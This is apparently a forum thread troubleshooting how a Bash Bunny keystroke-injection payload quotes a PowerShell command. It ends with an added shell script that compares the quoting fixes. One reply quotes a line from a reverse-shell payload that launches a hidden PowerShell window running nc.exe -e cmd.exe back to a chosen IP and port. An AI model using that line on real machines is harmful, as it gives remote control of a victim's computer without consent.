
Simple payload gets stuck halfway through


HamHack


Hey.

For some reason my Bash Bunny script gets stuck right after opening up the powershell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is.

This is my script:

LED SETUP

ATTACKMODE HID STORAGE

LED ATTACK

Q SET_LANGUAGE gb

Q GUI r
Q DELAY 150
Q STRING powershell
Q ENTER

Q DELAY 500

Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
Q ENTER
Q STRING cd payloads/switch1
Q ENTER

LED FINISH


@HamHack, just use some quotes around the string:


Q STRING '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''

Also think about using

RUN WIN powershell


@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?


I'm not a powershell guy to be honest... 

But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell?

QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"


The issue is with how bash on the Bunny is interpreting your string. An example: echo that line in a Linux bash terminal and you will see the issue. That is, replace "QUACK STRING" with echo, if you have access to a bash terminal. If not, then here is a trick to do it.

After your QUACK STRING, encapsulate the whole command in double quotes. Once you do that, you will only need to escape "$" and other inner double quotes. Single quotes can be by themselves without needing to escape. Example:

Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.

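To see why the '''...''' suggestion drops the single quotes while the double-quoted form from the last reply keeps them, here is an added example that is not from the thread or from any Hak5 payload: q_string is a stand-in for the Bunny's Q STRING that just returns the text it would type, so the three quoting variants can be compared on an ordinary POSIX shell, and the original unquoted line is shown to be a shell syntax error, which is what halts the payload right after PowerShell opens.

```shell
#!/bin/sh
# Stand-in for the Bash Bunny's Q / QUACK STRING (assumption: it joins its
# arguments with single spaces before typing them). It only returns the text.
q_string() {
    printf '%s' "$*"
}

# Variant from the second reply: '''...''' is really  ''  'cd ... "label='  BashBunny  '")...'  ''
# so the shell consumes the quotes around BashBunny before Q STRING sees them.
triple_quoted() {
    q_string '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''
}

# Variant from the last reply: one double-quoted word, inner double quotes
# escaped, single quotes left alone, so the text arrives intact.
double_quoted() {
    q_string "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"
}

# The original unquoted line never reaches Q STRING at all: the bare ( and )
# are a shell syntax error. Returns 0 when the shell refuses to parse it.
unquoted_fails_to_parse() {
    sh -n <<'EOF' 2>/dev/null && return 1
q_string cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
EOF
    return 0
}

# Show what each form would actually type.
printf 'triple-quoted : %s\n' "$(triple_quoted)"
printf 'double-quoted : %s\n' "$(double_quoted)"
unquoted_fails_to_parse && echo 'unquoted      : shell syntax error, payload halts here'
```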
